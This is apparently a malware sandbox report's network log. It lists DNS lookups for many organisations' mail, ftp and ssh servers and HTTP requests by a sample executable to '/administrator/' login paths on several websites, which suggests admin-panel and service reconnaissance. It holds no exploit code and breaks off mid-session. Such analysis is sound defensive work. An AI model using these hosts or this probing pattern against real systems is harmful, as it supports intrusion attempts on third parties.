                                                                                                                                                                                                    Nov 26, 2023 06:59:58.463231087 CET1.1.1.1192.168.2.40xf38dNo error (0)ceuandalucia-es.mail.protection.outlook.com52.101.68.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.463231087 CET1.1.1.1192.168.2.40xf38dNo error (0)ceuandalucia-es.mail.protection.outlook.com52.101.73.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.463231087 CET1.1.1.1192.168.2.40xf38dNo error (0)ceuandalucia-es.mail.protection.outlook.com52.101.73.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.463231087 CET1.1.1.1192.168.2.40xf38dNo error (0)ceuandalucia-es.mail.protection.outlook.com52.101.68.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.463231087 CET1.1.1.1192.168.2.40xf38dNo error (0)ceuandalucia-es.mail.protection.outlook.com52.101.73.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.463231087 CET1.1.1.1192.168.2.40xf38dNo error (0)ceuandalucia-es.mail.protection.outlook.com52.101.68.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.464421988 CET1.1.1.1192.168.2.40xcf29No error (0)celogic-com0e.mail.protection.outlook.com52.101.132.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.464421988 CET1.1.1.1192.168.2.40xcf29No error (0)celogic-com0e.mail.protection.outlook.com52.101.137.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.464421988 CET1.1.1.1192.168.2.40xcf29No error (0)celogic-com0e.mail.protection.outlook.com52.101.137.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.464421988 CET1.1.1.1192.168.2.40xcf29No error (0)celogic-com0e.mail.protection.outlook.com52.101.132.28A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.497616053 CET1.1.1.1192.168.2.40xf13cNo error (0)c47ab644ec7e3f14.mx1.emailprofi.seznam.cz77.75.77.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.498701096 CET1.1.1.1192.168.2.40x850aNo error (0)my-calvary-qld-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.498701096 CET1.1.1.1192.168.2.40x850aNo error (0)my-calvary-qld-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.504620075 CET1.1.1.1192.168.2.40xa599No error (0)upn-pe.mail.protection.outlook.com52.101.40.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.504620075 CET1.1.1.1192.168.2.40xa599No error (0)upn-pe.mail.protection.outlook.com52.101.9.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.504620075 CET1.1.1.1192.168.2.40xa599No error (0)upn-pe.mail.protection.outlook.com52.101.8.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.504620075 CET1.1.1.1192.168.2.40xa599No error (0)upn-pe.mail.protection.outlook.com52.101.11.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.504620075 CET1.1.1.1192.168.2.40xa599No error (0)upn-pe.mail.protection.outlook.com52.101.42.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.504620075 CET1.1.1.1192.168.2.40xa599No error (0)upn-pe.mail.protection.outlook.com52.101.40.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.504620075 CET1.1.1.1192.168.2.40xa599No error (0)upn-pe.mail.protection.outlook.com52.101.42.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.509365082 CET1.1.1.1192.168.2.40x7dcNo error (0)talentius-com.mail.protection.outlook.com104.47.17.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.509365082 CET1.1.1.1192.168.2.40x7dcNo error (0)talentius-com.mail.protection.outlook.com104.47.17.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.555350065 CET1.1.1.1192.168.2.40x5015No error (0)killicit.com35.169.59.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.555350065 CET1.1.1.1192.168.2.40x5015No error (0)killicit.com54.161.234.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.705801964 CET1.1.1.1192.168.2.40xe2f4No error (0)ftp.federwild.at185.183.156.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:01.233400106 CET1.1.1.1192.168.2.40x419aName error (3)ssh.hmichaelandco.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:01.352686882 CET1.1.1.1192.168.2.40xf8e8No error (0)ssh.viidelta.com89.31.143.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:01.421770096 CET1.1.1.1192.168.2.40x8aa1Name error (3)ssh.rochester-gauges.benonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:04.767878056 CET1.1.1.1192.168.2.40x871cNo error (0)ftp.bunasta.eu192.168.1.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:04.768309116 CET1.1.1.1192.168.2.40x3726Name error (3)ssh.bunasta.eunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:04.798146963 CET1.1.1.1192.168.2.40x467bNo error (0)mail.webstamp.ca72.167.58.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.271637917 CET1.1.1.1192.168.2.40xd94bName error (3)ftp.mdystudent.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.272931099 CET1.1.1.1192.168.2.40xf86fNo error (0)ftp.midcapfunding.commidcapfunding.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.272931099 CET1.1.1.1192.168.2.40xf86fNo error (0)midcapfunding.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.272931099 CET1.1.1.1192.168.2.40xf86fNo error (0)midcapfunding.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.335047007 CET1.1.1.1192.168.2.40xc00eName error (3)ftp.gmailvz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.379421949 CET1.1.1.1192.168.2.40x9f87Name error (3)ftp.svenssonfriends.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.382993937 CET1.1.1.1192.168.2.40x2362Name error (3)ftp.nyklawfirm.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.387218952 CET1.1.1.1192.168.2.40x9524Name error (3)ftp.leeberg.dknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.412552118 CET1.1.1.1192.168.2.40xbe72No error (0)ftp.quipuapp.com15.236.29.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.412552118 CET1.1.1.1192.168.2.40xbe72No error (0)ftp.quipuapp.com15.236.187.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.421633005 CET1.1.1.1192.168.2.40x378eName error (3)ftp.dstaq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.451358080 CET1.1.1.1192.168.2.40x62e0No error (0)ftp.robinsonland.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.451358080 CET1.1.1.1192.168.2.40x62e0No error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.451358080 CET1.1.1.1192.168.2.40x62e0No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.451358080 CET1.1.1.1192.168.2.40x62e0No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.452147961 CET1.1.1.1192.168.2.40xaaaeNo error (0)mail.robinsonland.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.452147961 CET1.1.1.1192.168.2.40xaaaeNo error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.452147961 CET1.1.1.1192.168.2.40xaaaeNo error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.452147961 CET1.1.1.1192.168.2.40xaaaeNo error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.454937935 CET1.1.1.1192.168.2.40xb585No error (0)ftp.saudi-jamac.comsaudi-jamac.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.454937935 CET1.1.1.1192.168.2.40xb585No error (0)saudi-jamac.com76.223.105.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.454937935 CET1.1.1.1192.168.2.40xb585No error (0)saudi-jamac.com13.248.243.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.486953020 CET1.1.1.1192.168.2.40xb540Name error (3)ftp.2brosandahosepressurewashing.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.494746923 CET1.1.1.1192.168.2.40x6d5Name error (3)ftp.esoft.academynonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.629298925 CET1.1.1.1192.168.2.40x976No error (0)ftp.srmist.edu.in103.4.223.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.785583019 CET1.1.1.1192.168.2.40xc50cName error (3)ftp.killicit.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.886678934 CET1.1.1.1192.168.2.40x7d7bName error (3)ftp.linkan-group.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.919763088 CET1.1.1.1192.168.2.40x6f9cName error (3)ftp.rdelealtad.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.919853926 CET1.1.1.1192.168.2.40x32a4Name error (3)mail.ibright.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.982625008 CET1.1.1.1192.168.2.40x95b0Name error (3)ftp.greenrworld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.085360050 CET1.1.1.1192.168.2.40xc20cNo error (0)mail.macisis.co.ukmail.totalise.co.ukCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.085360050 CET1.1.1.1192.168.2.40xc20cNo error (0)mail.totalise.co.uk212.159.9.240A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.085360050 CET1.1.1.1192.168.2.40xc20cNo error (0)mail.totalise.co.uk212.159.8.240A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.156301022 CET1.1.1.1192.168.2.40xb2d8Name error (3)pop.ibright.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.257525921 CET1.1.1.1192.168.2.40x6b9eName error (3)pop.edgewater.groupnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.367352962 CET1.1.1.1192.168.2.40xb368Name error (3)pop3.ibright.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.469705105 CET1.1.1.1192.168.2.40x28a5Name error (3)ftp.hightideinc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.488642931 CET1.1.1.1192.168.2.40x31baNo error (0)smtp.secureserver.net68.178.213.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.488642931 CET1.1.1.1192.168.2.40x31baNo error (0)smtp.secureserver.net216.69.141.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.488642931 CET1.1.1.1192.168.2.40x31baNo error (0)smtp.secureserver.net68.178.213.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.500859022 CET1.1.1.1192.168.2.40xe3d6Name error (3)pop3.edgewater.groupnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.509489059 CET1.1.1.1192.168.2.40x920fNo error (0)d405642.b.ess.ca.barracudanetworks.com15.222.16.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.509489059 CET1.1.1.1192.168.2.40x920fNo error (0)d405642.b.ess.ca.barracudanetworks.com15.222.16.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.509489059 CET1.1.1.1192.168.2.40x920fNo error (0)d405642.b.ess.ca.barracudanetworks.com15.222.16.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.556166887 CET1.1.1.1192.168.2.40x8060No error (0)mail.townshipnjr.com66.81.203.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.556166887 CET1.1.1.1192.168.2.40x8060No error (0)mail.townshipnjr.com66.81.203.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.556166887 CET1.1.1.1192.168.2.40x8060No error (0)mail.townshipnjr.com66.81.203.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.570472002 CET1.1.1.1192.168.2.40xb96aNo error (0)mx2.improvmx.com13.36.107.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.570472002 CET1.1.1.1192.168.2.40xb96aNo error (0)mx2.improvmx.com13.36.222.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.570472002 CET1.1.1.1192.168.2.40xb96aNo error (0)mx2.improvmx.com15.236.61.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.608361006 CET1.1.1.1192.168.2.40xd3e4Name error (3)mailgate.ibright.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.860806942 CET1.1.1.1192.168.2.40xbfe0Name error (3)relay.ibright.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.896809101 CET1.1.1.1192.168.2.40xf067Name error (3)mailgate.edgewater.groupnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.961405039 CET1.1.1.1192.168.2.40x57c8No error (0)ftp.townshipnjr.com66.81.203.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.961405039 CET1.1.1.1192.168.2.40x57c8No error (0)ftp.townshipnjr.com66.81.203.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.961405039 CET1.1.1.1192.168.2.40x57c8No error (0)ftp.townshipnjr.com66.81.203.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:07.109780073 CET1.1.1.1192.168.2.40x4475Name error (3)relay.edgewater.groupnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:08.056340933 CET1.1.1.1192.168.2.40x7535No error (0)ftp.americanrecords.itamericanrecords.itCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:08.056340933 CET1.1.1.1192.168.2.40x7535No error (0)americanrecords.it109.168.109.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:08.071517944 CET1.1.1.1192.168.2.40xb980Name error (3)ftp.talentius.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:08.103125095 CET1.1.1.1192.168.2.40xbef0No error (0)mail.grg17geblergasse.at81.19.149.83A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:08.243297100 CET1.1.1.1192.168.2.40x3768No error (0)jamiesonmullin-com.mail.protection.outlook.com104.47.75.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:08.243297100 CET1.1.1.1192.168.2.40x3768No error (0)jamiesonmullin-com.mail.protection.outlook.com104.47.75.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:08.254494905 CET1.1.1.1192.168.2.40x1607No error (0)ibright-net.mail.protection.outlook.com104.47.59.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:08.254494905 CET1.1.1.1192.168.2.40x1607No error (0)ibright-net.mail.protection.outlook.com104.47.55.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:08.399961948 CET1.1.1.1192.168.2.40x8e55Name error (3)mail.maxiv.lu.senonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:08.415282011 CET1.1.1.1192.168.2.40x4d2bNo error (0)ftp.daisyokogyo.co.jp202.226.37.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:08.436640978 CET1.1.1.1192.168.2.40xd94aName error (3)ftp.digdig.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:09.121491909 CET1.1.1.1192.168.2.40x4f8aNo error (0)ftp.esistem.com.brweb202.uni5.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:09.121491909 CET1.1.1.1192.168.2.40x4f8aNo error (0)web202.uni5.net191.6.210.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:09.121505022 CET1.1.1.1192.168.2.40x4f8aNo error (0)ftp.esistem.com.brweb202.uni5.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:09.121505022 CET1.1.1.1192.168.2.40x4f8aNo error (0)web202.uni5.net191.6.210.8A (IP address)IN (0x0001)false

                                                                                                                                                                                                    HTTP Packets

                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    0192.168.2.45131123.185.0.1806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.863420963 CET228OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: avient.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.985487938 CET787INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Content-Length: 162
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Location: https://avient.com/administrator/
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    X-Pantheon-Styx-Hostname: styx-fe1-b-7645784b77-7fc27
                                                                                                                                                                                                    X-Styx-Req-Id: a0e05447-8c1c-11ee-b644-629e51a2f0c1
                                                                                                                                                                                                    Cache-Control: public, max-age=86400
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:28 GMT
                                                                                                                                                                                                    X-Served-By: cache-chi-klot8100069-CHI, cache-ewr18143-EWR
                                                                                                                                                                                                    X-Cache: HIT, MISS
                                                                                                                                                                                                    X-Cache-Hits: 1, 0
                                                                                                                                                                                                    X-Timer: S1700978369.905548,VS0,VE22
                                                                                                                                                                                                    Vary: Cookie, Cookie
                                                                                                                                                                                                    Age: 1861
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    1192.168.2.45176944.219.53.183806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.055126905 CET230OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: killicit.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.150309086 CET345INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:29 GMT
                                                                                                                                                                                                    Location: https://killicit.com/administrator/
                                                                                                                                                                                                    Server: Netlify
                                                                                                                                                                                                    X-Nf-Request-Id: 01HG53C8J4DTHG4X0QNX3HCHF8
                                                                                                                                                                                                    Content-Length: 50
                                                                                                                                                                                                    Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 6b 69 6c 6c 69 63 69 74 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f
                                                                                                                                                                                                    Data Ascii: Redirecting to https://killicit.com/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.566021919 CET239OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: killicit.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.659729958 CET363INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:29 GMT
                                                                                                                                                                                                    Location: https://killicit.com/administrator/index.php
                                                                                                                                                                                                    Server: Netlify
                                                                                                                                                                                                    X-Nf-Request-Id: 01HG53C921EAP2H5QF0R67Z82S
                                                                                                                                                                                                    Content-Length: 59
                                                                                                                                                                                                    Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 6b 69 6c 6c 69 63 69 74 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70
                                                                                                                                                                                                    Data Ascii: Redirecting to https://killicit.com/administrator/index.php


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    2192.168.2.4517653.33.130.190806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.055314064 CET232OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: mdystudent.net
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.152232885 CET893INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                    Server: openresty
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:29 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Location: https://mdystudent.net/administrator/
                                                                                                                                                                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_an3vI8lL1EfJkhht0bLFQ8CU7frXwS4bJ+LSEgUA0FvXEoxIt0Qg3ULBmAtKHjcLMXFjbRmb5R5CTe1onxvkfQ
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                    Set-Cookie: caf_ipaddr=10.116.88.246;Path=/;Max-Age=86400;
                                                                                                                                                                                                    Set-Cookie: country=;Path=/;Max-Age=86400;
                                                                                                                                                                                                    Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                    Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400;
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.552129030 CET313OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: mdystudent.net
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: traffic_target=gd; caf_ipaddr=10.116.88.246; country=; city=""
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.650212049 CET902INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                    Server: openresty
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:29 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 142
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Location: https://mdystudent.net/administrator/index.php
                                                                                                                                                                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_Tx+TaqqCZLbg5VidflQRjdP1ZnUNTWN/FgruNljasv9FNZ/VcTm7xjTGbADf3GCIK8KbsF3tksoBtWzg+AU77A
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                    Set-Cookie: caf_ipaddr=10.116.88.246;Path=/;Max-Age=86400;
